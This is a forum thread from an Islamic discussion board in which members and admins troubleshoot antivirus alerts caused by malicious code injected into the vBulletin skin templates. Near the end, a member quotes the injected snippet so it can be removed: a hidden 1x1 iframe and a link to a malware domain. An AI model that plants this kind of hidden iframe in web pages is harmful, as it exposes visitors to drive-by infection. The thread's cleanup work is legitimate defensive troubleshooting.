Possible Trojan link

[IslamicRevival]

I dunno why some people are looking for shortcuts. Just get rid of the **** virus Admins and the problem is no more!

It's been about a good month and this site is still infected. Poor handling by the whole Islamicboard team. Either shut the site down temporarily until the site is virus free or keep this site up and running and be responsible for infecting hundreds of computers

 

[Woodrow]

I dunno why some people are looking for shortcuts. Just get rid of the **** virus Admins and the problem is no more!

It's been about a good month and this site is still infected. Poor handling by the whole Islamicboard team. Either shut the site down temporarily until the site is virus free or keep this site up and running and be responsible for infecting hundreds of computers

Nobody's computers are being infected.

It is not a virus or any active spyware, although the footprint is still identified as malware by some anti-spyware and anti-virus software. so far we have not been able to identify the source of it. Only one person has the ability to disable the various features to test to see if the source can be identified. While it is irritating to some, there is no evidence of any harm. the link is a dead link and does not contain anything at all. The link does not connect to anything, it is dead. Apparently at one time it was a link to spyware of some type, most likely part of an advertisement. But the ad it pertained to seems to be long gone and that blasted thing is an artifact.

 

[أحمد]

Software firewall users: Deny bobi123.com access without showing notifications.

Hardware firewall users: Block bobi123.com & 92.63.96.155 through the router/bridge/switch settings.

:wa:

 

[أحمد]

Hardware firewall #2 (to block FTP & HTTP service):

Remember to set FTP:TCP ports 20-21; this is to block the script from trying to download. Set HTTP port 80.

:wa:

 

[IslamicRevival]

Nobody's computers are being infected.

It is not a virus or any active spyware, although the footprint is still identified as malware by some anti-spyware and anti-virus software. so far we have not been able to identify the source of it. Only one person has the ability to disable the various features to test to see if the source can be identified. While it is irritating to some, there is no evidence of any harm. the link is a dead link and does not contain anything at all. The link does not connect to anything, it is dead. Apparently at one time it was a link to spyware of some type, most likely part of an advertisement. But the ad it pertained to seems to be long gone and that blasted thing is an artifact.

The website bobi123.com is marked as a dangerous site according to McAfee siteadvisor. It's known for spreading viruses, dead link? I doubt that.

AV developers would have updated their virus definitions and excluded bobi123 if it was a dead link.

 

[Dagless]

The website bobi123.com is marked as a dangerous site according to McAfee siteadvisor. It's known for spreading viruses, dead link? I doubt that.

AV developers would have updated their virus definitions and excluded bobi123 if it was a dead link.

Here is the link: http://bobi123.com/a/index.php
It is dead.

 

[Woodrow]

The website bobi123.com is marked as a dangerous site according to McAfee siteadvisor. It's known for spreading viruses, dead link? I doubt that.

AV developers would have updated their virus definitions and excluded bobi123 if it was a dead link.

I understand your concerns and if I believed it was infecting my computer I also would not be logging on. But I can find no indication that any malware or viruses have been downloaded onto my PC. I do turn off my antivirus when visiting here. but periodically log off and do a full scan. Nothing has been found. Nothing has been downloaded onto my PC even when the anti virus software is disable. same for my anti trojan and malware. Although both of them identify the bobi123 as malware and prevent me from logging on if I have them running.

Up until the other day the link was available for anyone to buy. I just rechecked and somebody did buy it and seems to be offering it for resale, however purchase of it has to be made through a broker.

An automated review of your brokerage application returned the following assessment:
The domain bobi123.com is already registered.

Hire a broker!
Sedo´s Domain Acquisition Service

Are you looking to buy a domain that may not be listed for sale on our marketplace? Registered domains can sometimes be purchased from the existing owner. Hire an experienced Sedo broker to negotiate an acquisition on your behalf.

* Your ApplicationYour Application
* Application ReviewYour Application
* NegotiationsYour Application
* Domain TransferYour Application

Your Application

* Submit the brokerage application form, including the domain you would like to acquire, with the maximum price you are willing to spend on your domain investment.
* There is no upfront application fee, so you pay only for premium service. Your credit card will only be charged with a 69 USD brokerage retention fee if your brokerage application is accepted. Please see our price list for the commission fee.
Please Note, our fee of 10% will be in addition to your maximum budget if we are successful in acquiring the domain name on your

SOURCE

Trying to connect directly to the link gives you this:

The only scripting on the site is HTML the site is written in Russian and for some reason I can not save the cyrillic font and it shows as gibberish.

From Google Safe Browsing I get this:

Apparently at one time the site did contain spyware and did infect one site ihiphop.com but for the past 90days it has been benign and has not infected any computers or other sites. There is no indication of any virus or other malware. Now if a certain somebody would check through the recent added features on the forum and remove the one that contains the link we would all be happier. It is a pest even though it is benign.

 

[AabiruSabeel]

There's good news for everyone. We have finally found the possible culprit which is adding the malicious code in the forum templates. For now, the Element Purple skin is fixed and we are still trying to fix it in other skins. Till then, please scroll down and use Element Purple skin for browsing this forum.

 

[IslamicRevival]

There's good news for everyone. We have finally found the possible culprit which is adding the malicious code in the forum templates. For now, the Element Purple skin is fixed and we are still trying to fix it in other skins. Till then, please scroll down and use Element Purple skin for browsing this forum.

Fantastic news, i will check out this site tomorrow from computer using the element purple skin, Hopefully no more darn AV pop up alerts!

 

[IslamicRevival]

Thank you brother woodrow for the clear explanation

 

[IslamicRevival]

Logged on the site, quickly changed the skin to Element purple and everything seems fine so far, Good job Admins, even though it took you 3 to 4 weeks to sort it out

 

[IslamicRevival]

Has this bobi123 malware been removed completely? still flagging up as a virus on main theme :/ an update from MODS would be good

 

[Woodrow]

Has this bobi123 malware been removed completely? still flagging up as a virus on main theme :/ an update from MODS would be good

As far as I know still appears if you do not use Element Purple skin. I just tried switching skins and using different anti-virus. It is detected on the other skins if I use avast but not if I use Threatfire. I am going to see if I can find other forums that use

Powered by vBulletin™ Version 4.0.3
Copyright © 2010 vBulletin Solutions, Inc. All rights reserved.
SEO by vBSEO 3.5.0 RC3
vBulletin Skin developed by: vBStyles.com

and see if that may be the overall source. I myself have very little knowledge in the newer program languages, butI do know the other admins who are familiar with the programming are still working on this.

 

[أحمد]

In the script; delete the following codes:

<div><iframe src=[URL]http://bobi123.com/a/index.php[/URL] width=1 height=1 style="visibility:hidden;position:absolute"></iframe></div>

<a href="http://bobi123.com/a/index.php">http://bobi123.com/a/index.php</a>

:wa:

 

[أحمد]

The problem appears to be in the "above body" code area. The second code segment is preceded by "URL:", while the first has <hr/></div> before it.

:wa:

 

['Abd Al-Maajid]

^If only it was that simple :ermm:

Shouldn't be difficult at all (if only you know scripting).

 

[أحمد]

^If only it was that simple :ermm:

Its not easy, and to make matters worse; it has to be done for each of the skins.

:wa:

 

[أحمد]

Shouldn't be difficult at all (if only you know scripting).

Abu Ya7ya know's scripting better than most of us.

:wa:

 

['Abd Al-Maajid]

Abu Ya7ya know's scripting better than most of us.

:wa:

Dang! I was not implying that he doesn't know scripting. And sorry if I hurt someone.